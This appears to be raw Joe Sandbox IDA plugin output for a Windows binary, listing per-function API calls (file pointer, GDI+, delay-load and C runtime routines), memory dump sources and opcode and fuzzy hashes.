                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: 226a75081ce26f23f5966b74af185c554c71632798e6e77ca234cfd69f88e8dc
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 9dab2befde53527a536c230596ca9c02e6f3e96bb700513ebfb4575255fc7081
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: 9dab2befde53527a536c230596ca9c02e6f3e96bb700513ebfb4575255fc7081
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 0657613e417671cf7740022023628f36fb59682a105893216cf919e2e4d8b6ee
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: 0657613e417671cf7740022023628f36fb59682a105893216cf919e2e4d8b6ee
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: d335f50eaed1f5bb23d6ec7ce966c248287a9ca64112d04cd8f14183d20ae53d
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: d335f50eaed1f5bb23d6ec7ce966c248287a9ca64112d04cd8f14183d20ae53d
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: e813988508b2b041516a2c2bb46659bf7d08e9e89ba0a88085376ce25b15c4fa
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: e813988508b2b041516a2c2bb46659bf7d08e9e89ba0a88085376ce25b15c4fa
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: dcf2680d8f2af60a2a0334f2dadf452090dfa06e6577412ff5c512dbb4a0e1f9
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: dcf2680d8f2af60a2a0334f2dadf452090dfa06e6577412ff5c512dbb4a0e1f9
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: c824687e45493897461b30dd5971647cab3b89ec0b518f58979817259e36e7fc
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: c824687e45493897461b30dd5971647cab3b89ec0b518f58979817259e36e7fc
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,00E6E3B1,?,?,00000000,?,?,00E6CC21,?), ref: 00E6E55F
                                                                                              • GetLastError.KERNEL32 ref: 00E6E56E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: e19f78f74a78870f127e2e427a46d7d64d721c759edf0c3f0cba8ac948c59e2d
                                                                                              • Instruction ID: c5c7b6c7677f8d46e2ccfe3e9d770e22d5261d510501420a64c8f6effde6d898
                                                                                              • Opcode Fuzzy Hash: e19f78f74a78870f127e2e427a46d7d64d721c759edf0c3f0cba8ac948c59e2d
                                                                                              • Instruction Fuzzy Hash: 1E411538644740CBC724AF75E4846EAB3E5FF583A4F14551ED866A33C1EB70DC458BA1
                                                                                              APIs
                                                                                                • Part of subcall function 00E90005: GetLastError.KERNEL32(?,?,00E8B581,?,00EAE088,?,00E8AE80,?,00EAE088,?,00000007), ref: 00E90009
                                                                                                • Part of subcall function 00E90005: _free.LIBCMT ref: 00E9003C
                                                                                                • Part of subcall function 00E90005: SetLastError.KERNEL32(00000000,00EAE088,?,00000007), ref: 00E9007D
                                                                                                • Part of subcall function 00E90005: _abort.LIBCMT ref: 00E90083
                                                                                                • Part of subcall function 00E927FE: _abort.LIBCMT ref: 00E92830
                                                                                                • Part of subcall function 00E927FE: _free.LIBCMT ref: 00E92864
                                                                                                • Part of subcall function 00E9246B: GetOEMCP.KERNEL32(00000000,?,?,00E926F4,?), ref: 00E92496
                                                                                              • _free.LIBCMT ref: 00E9274F
                                                                                              • _free.LIBCMT ref: 00E92785
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: e67f39d54269a7a3aed6be941c6e4789fd5040b444cf8bff39ae059920b2ac9d
                                                                                              • Instruction ID: 7eee47a368846c72339e6058aa4f15900e94754f44eb181b587965b2c0015d96
                                                                                              • Opcode Fuzzy Hash: e67f39d54269a7a3aed6be941c6e4789fd5040b444cf8bff39ae059920b2ac9d
                                                                                              • Instruction Fuzzy Hash: D1319131904208BFDF10EBA9D841BA9B7F5AF45324F25509EE604BB2A2EB729D41DB50
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?), ref: 00E6E78C
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00E6E840
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: cc3839a022ce878dc7eec05aa97d76de1b2b9539193a7a34c88993ad7d06be75
                                                                                              • Instruction ID: 5c7a4f9d454fbdc2b0a3382853bb0e98be90923ed198c787d15f3802b951f0d3
                                                                                              • Opcode Fuzzy Hash: cc3839a022ce878dc7eec05aa97d76de1b2b9539193a7a34c88993ad7d06be75
                                                                                              • Instruction Fuzzy Hash: 28210439289241EFC714DE24D481AABBBE8AF91748F04591EF4C593281D328F90CC762
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00E6E897
                                                                                              • GetLastError.KERNEL32 ref: 00E6E8A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 76243115cfdc44f237a44964e62f693b990d14276443b6426e5d27143ceb57c3
                                                                                              • Instruction ID: 218e5287f4e42c96d337622e0e0f8f336195601f38ac754250e5a3b5729e574b
                                                                                              • Opcode Fuzzy Hash: 76243115cfdc44f237a44964e62f693b990d14276443b6426e5d27143ceb57c3
                                                                                              • Instruction Fuzzy Hash: 9911E534680700AFE7389625D8817A677E9AB453B4F641769E062B36D0D7B0FD05CB60
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E61CE9
                                                                                              • GetDlgItem.USER32(?,?), ref: 00E61D01
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_Item_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 896027972-0
                                                                                              • Opcode ID: de0bd63f4e8a40f9d0cb9206cbd0e9a858d674b47388bc581233fc1a659119bb
                                                                                              • Instruction ID: bec1e4e02c7086ab1079f35846da9d2946aec042edbcebf38036a896e50b5fdf
                                                                                              • Opcode Fuzzy Hash: de0bd63f4e8a40f9d0cb9206cbd0e9a858d674b47388bc581233fc1a659119bb
                                                                                              • Instruction Fuzzy Hash: F001F7716803048FD722EFA8E846BEDB7ECEF54385F08214AF91AB7292CB705A01C750
APIs
• GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,00E776EA,00E70B6F), ref: 00E776B4
• GetProcessAffinityMask.KERNEL32(00000000,?,00E776EA), ref: 00E776BB
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: Process$AffinityCurrentMask
• String ID:
• API String ID: 1231390398-0
• Opcode ID: fc8c080ebc7a6163ae1de9c95a087aaf544d8870ee40912a01e32b75ecc7411d
• Instruction ID: ec7fc999b03f12fd700887fba517f18603095a26f007640d5137872070762fc1
• Opcode Fuzzy Hash: fc8c080ebc7a6163ae1de9c95a087aaf544d8870ee40912a01e32b75ecc7411d
• Instruction Fuzzy Hash: 0FE0D833F14506ABCF1997ED9C059EB72DDEB44248724907AE457F3104F974DD0547A0
APIs
• GdiplusShutdown.GDIPLUS(?,?,?,?,00E99B73,000000FF), ref: 00E7F578
• CoUninitialize.COMBASE(?,?,?,?,00E99B73,000000FF), ref: 00E7F57D
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: GdiplusShutdownUninitialize
• String ID:
• API String ID: 3856339756-0
• Opcode ID: 97011c648c17a510ed3c5f99ba9c14c49c1ad7e8306f2d7a450af84f5d3c27d0
• Instruction ID: 5683d32bb396c11f0bb33935a5e0ca150c2ded07c7d5c184760199e830b69703
• Opcode Fuzzy Hash: 97011c648c17a510ed3c5f99ba9c14c49c1ad7e8306f2d7a450af84f5d3c27d0
• Instruction Fuzzy Hash: ECF08276604A04AFC700DF5AEC41B4ABBE8FB49770F00422AF416E3760DB74A804CAA4
APIs
• GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E7E86A
• GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00E7E871
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: BitmapCreateFromGdipStream
• String ID:
• API String ID: 1918208029-0
• Opcode ID: d9a82ca3c973f8dcaaf998671294584af0d8231b8d02dfa8a279502d0ad0affa
• Instruction ID: 8f6f147eee3c88231a082ead82426133738f9d6d8751259a060a6eb0825846f0
• Opcode Fuzzy Hash: d9a82ca3c973f8dcaaf998671294584af0d8231b8d02dfa8a279502d0ad0affa
• Instruction Fuzzy Hash: 59E09271800218EFDB10EF84C8017DDB7F8EB09350F20C05AA88DB3301EAB0AE00EB91
APIs
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: ItemShowWindow
• String ID:
• API String ID: 3351165006-0
• Opcode ID: d1ba8105fb055dfec309d02cd4597558403e16ffab7b757f6632a2b8304da695
• Instruction ID: 8c1a66898dc0bbedd99a1d2da3a57662a1d6c2fcae75a601888f1cf53a8d84e4
• Opcode Fuzzy Hash: d1ba8105fb055dfec309d02cd4597558403e16ffab7b757f6632a2b8304da695
• Instruction Fuzzy Hash: 75C012B205C200BECB020BB5DC09D2BBBA8ABE4212F00CA08B2E5E0060C239C014DB21
APIs
• GetDlgItem.USER32(?,?), ref: 00E61CD2
• KiUserCallbackDispatcher.NTDLL(00000000), ref: 00E61CD9
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: CallbackDispatcherItemUser
• String ID:
• API String ID: 4250310104-0
• Opcode ID: e171ef955c52decf4a1efbb538e6ac95be3b1b88024dba5a76b0b84c311f0c1a
• Instruction ID: fc88e45cdaa58e4edd57e0869ea72b4162afe4675305f49509a627f15aa4e765
• Opcode Fuzzy Hash: e171ef955c52decf4a1efbb538e6ac95be3b1b88024dba5a76b0b84c311f0c1a
• Instruction Fuzzy Hash: AEC04C7640D240BFCB015BA59D1CC2FBFA9ABD5311F00CA49F6E590561C635C414DB21
APIs
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 4b019f3a7832f9c6a099ec8314f5c2e4e35b5f10a4242205ff83be10758ae3eb
• Instruction ID: 26841c98a0d601e8cdfcc1a9111bb122bac8af53c1b8882c0ff5a538059427a5
• Opcode Fuzzy Hash: 4b019f3a7832f9c6a099ec8314f5c2e4e35b5f10a4242205ff83be10758ae3eb
• Instruction Fuzzy Hash: B6C1CF30A44A449BDF25DF64E8947ED3BE0AB85344F1860BEEE05FF296C7749844CBA1
APIs
• __EH_prolog3.LIBCMT ref: 00E620B7
  • Part of subcall function 00E680EC: __EH_prolog3.LIBCMT ref: 00E680F3
  • Part of subcall function 00E72815: __EH_prolog3.LIBCMT ref: 00E7281C
  • Part of subcall function 00E676E7: __EH_prolog3.LIBCMT ref: 00E676EE
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
